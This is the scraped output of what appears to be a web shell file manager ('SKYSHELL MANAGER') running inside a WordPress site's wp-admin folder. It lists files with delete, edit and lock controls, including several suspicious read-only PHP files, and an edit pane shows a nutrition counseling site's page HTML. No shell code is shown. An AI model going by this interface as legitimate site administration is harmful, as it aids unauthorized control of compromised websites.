📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-functions.php
0.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-advanced.php
28.79 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-tags.php
21.98 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tools.php
3.43 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets.php
1.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: page1.php
<!DOCTYPE html> <html lang="en"> <head> <title>Dietnutris</title> <link rel="icon" type="image/x-icon" href="images/fav.ico"> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> <meta name="description" content=""> <meta name="keywords" content=""> <meta name="author" content="Tooplate"> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <link rel="stylesheet" href="css/bootstrap.min.css"> <link rel="stylesheet" href="css/font-awesome.min.css"> <link rel="stylesheet" href="css/animate.css"> <link rel="stylesheet" href="css/owl.carousel.css"> <link rel="stylesheet" href="css/owl.theme.default.min.css"> <!-- MAIN CSS --> <link rel="stylesheet" href="css/tooplate-style.css"> <style> .dropdown { position: relative; display: inline-block; padding-top: 14px; } .dropdown-content { display: none; position: absolute; background-color: #f1f1f1; min-width: 260px; box-shadow: 0px 8px 16px 0px rgba(0,0,0,0.2); z-index: 1; } .dropdown-content a { color: black; padding: 12px 16px; text-decoration: none; display: block; } .dropdown-content a:hover {background-color: #ddd;} .dropdown:hover .dropdown-content {display: block;} </style> </head> <body id="top" data-spy="scroll" data-target=".navbar-collapse" data-offset="50"> <!-- HEADER --> <!-- MENU --> <section class="navbar navbar-default navbar-static-top" role="navigation"> <div class="container"> <div class="navbar-header"> <button class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse"> <span class="icon icon-bar"></span> <span class="icon icon-bar"></span> <span class="icon icon-bar"></span> </button> <!-- lOGO TEXT HERE --> <a href="index.php" class="navbar-brand"><img src="images/logo1.jpg" class="img-responsive"></a> </div> <!-- MENU LINKS --> <div class="collapse navbar-collapse"> <ul class="nav navbar-nav navbar-right"> <li><a href="index.php" class="smoothScroll">Home</a></li> <li><a href="about.php" class="smoothScroll">About Us</a></li> <li> <div class="dropdown"> <a class="smoothScroll">Work With Us</a> <div class="dropdown-content"> <a href="page1.php">Nutrition Counseling</a> <a href="page2.php">Nutrition Talks</a> <a href="page3.php">Health Professionals Mentoring</a> </div> </div> </li> <li><a href="page4.php" class="smoothScroll">Yoga & Meditation</a></li> <li><a href="contact.php" class="smoothScroll">Contact</a></li> <li class="appointment-btn"><a href="subscribe.php">Our Health Updates</a></li> </ul> </div> </div> </section> <!-- HOME --> <section id="home" class="slider" data-stellar-background-ratio="0.5"> <div class="container"> <div class="row"> <div class="item item-four"> <div class="caption"> <div class="col-md-offset-1 col-md-10"> <h1>Nutrition Counseling</h1> </div> </div> </div> </div> </div> </section> <!-- NEWS DETAIL --> <section id="news-detail" data-stellar-background-ratio="0.5"> <div class="container"> <div class="row"> <div class="col-md-6 col-sm-7"> <h2 style="font-weight: 100;">Intuitive Eating + Wellness</h2> <p>After working with clients one-on-one, we see them develop a more peaceful relationship with food and their bodies, they feel more energized and optimistic, and they begin to make space in their lives for the things that truly matter to them.</p> <p>Through ongoing sessions we work to come up with a personalized plan to help clients feel better about their food choices.</p> <p><b>Here is how we can make that happen for you:</b></p> <p>1. Let’s chat on the phone! Schedule your 15-minute initial phone consult where we can learn more about your goals and share information about our appointments.</p> <p>2. We meet for an hour-long initial session where we will take a look at your experiences with food, your current lifestyle, what’s working for you and what areas need attention. We cover food intake, exercise, sleep, medical history, stress and anything else that might be impacting your goals with your overall health. </p> <p>3. Over the course of our time together, we will work to execute your nutrition and wellness plan. In follow up appointments we will discuss your progress since we last met – what has worked and what do we need to change? What questions came up and what was challenging since we last met? At the end of each session, we create a few goals to work towards until our next session.</p> <p>In between sessions, we are available by e-mail and through our patient portal for any questions or updates. We are here to support you each step of the way and can’t wait to work with you!</p> <h3 style="font-size: 18px;padding-bottom: 30px;color: #bad255;">We also offer Nutrition Therapy and Coaching for the following:</h3> <p>High Blood Pressure</p> <p>High cholesterol</p> <p>Diabetes, Type 1 & 2</p> <p>Gestational Diabetes</p> <p>Cardiovascular Disease</p> <p>Crohn’s Disease</p> <p>Pediatric Nutrition</p> <p>Prenatal and Postpartum Nutrition</p> <p>Food Allergies and Intolerances</p> <p>Celiac Disease</p> <p>IBS</p> <p>Eating Disorders</p> <p>Low Energy and Fatigue</p> <p>Lifestyle and Overall Wellness</p> <p>PCOS</p> <p>FODMAP Diets</p> <p>GERD</p> </div> <div class="col-md-6 col-sm-5"> <h3 style="font-size: 18px;padding-bottom: 30px;color: #bad255;">Nutrition Counseling Locations:</h3> <ul> <li>Virtual</li> <li>Washington, DC</li> <li>Leesburg, VA</li> <li>Old Town Alexandria, VA</li> </ul> <h3 style="font-size: 18px;padding-bottom: 30px;color: #bad255;">Session Pricing: </h3> <p>Please contact us for a free phone consultation prior to meeting and we can discuss your goals and appointment information!</p> <p>We are out of network and provide paperwork at the end of sessions to send to your insurance for possible reimbursement. </p> <p>We also offer a sliding scale for those who have any financial hardships and are interested in meeting. Feel free to contact us to discuss available options. </p><br> <a href="contact.php" class="section-btn btn btn-default smoothScroll">Contact Us</a> </div> </div> </div> </section> <!-- FOOTER --> <footer data-stellar-background-ratio="5"> <div class="container"> <div class="row"> <div class="col-md-4 col-sm-4"> <div class="footer-thumb"> <h4 class="wow fadeInUp" data-wow-delay="0.4s">What We Do</h4> <p>Our dedication to scientific research and innovation inspires our team of experts every day to develop nutrition products to help build and maintain health from infancy onward.</p> </div> </div> <div class="col-md-4 col-sm-4"> <div class="footer-thumb"> <h4 class="wow fadeInUp" data-wow-delay="0.4s">Navigation Links</h4> <p><a href="subscribe.php">Our Newsletter</a></p> <p><a href="page1.php">Nutrition Counseling</a></p> <p><a href="page2.php">Nutrition Talks</a></p> <p><a href="page3.php">Health Professionals Mentoring</a></p> <p><a href="page4.php" class="smoothScroll">Yoga & Meditation</a></p> </div> </div> <div class="col-md-4 col-sm-4"> <div class="footer-thumb"> <h4 class="wow fadeInUp" data-wow-delay="0.4s">Contact Info</h4> <div class="contact-info"> <p><i class="fa fa-phone"></i> (+91) 95975 46987</p> <p><i class="fa fa-envelope-o"></i> <a href="mailto:anthonychavez@dietnutris.com">anthonychavez@dietnutris.com</a></p> <p style="display: flex;"><i class="fa fa-map-marker"></i>No 12 Vinayagapuram,<br> Kalangarkarunanithi street,<br> Oorakadam, Aambathur,<br> Chennai, Tamilnadu, IN - 600053.</p> </div> </div> </div> <div class="col-md-12 col-sm-12 border-top"> <div class="col-md-4 col-sm-6"> <div class="copyright-text"> <p>Copyright © 2024 Dietnutris</p> </div> </div> <div class="col-md-6 col-sm-6"> <div class="footer-link"> <a href="privacy.php">Privacy Policy</a> <a href="terms.php">Terms & Conditions</a> </div> </div> <div class="col-md-2 col-sm-2 text-align-center"> <div class="angle-up-btn"> <a href="#top" class="smoothScroll wow fadeInUp" data-wow-delay="1.2s"><i class="fa fa-angle-up"></i></a> </div> </div> </div> </div> </div> </footer> <!-- SCRIPTS --> <script src="js/jquery.js"></script> <script src="js/bootstrap.min.js"></script> <script src="js/jquery.sticky.js"></script> <script src="js/jquery.stellar.min.js"></script> <script src="js/jquery.magnific-popup.min.js"></script> <script src="js/magnific-popup-options.js"></script> <script src="js/wow.min.js"></script> <script src="js/smoothscroll.js"></script> <script src="js/owl.carousel.min.js"></script> <script src="js/custom.js"></script> </body> </html>
Save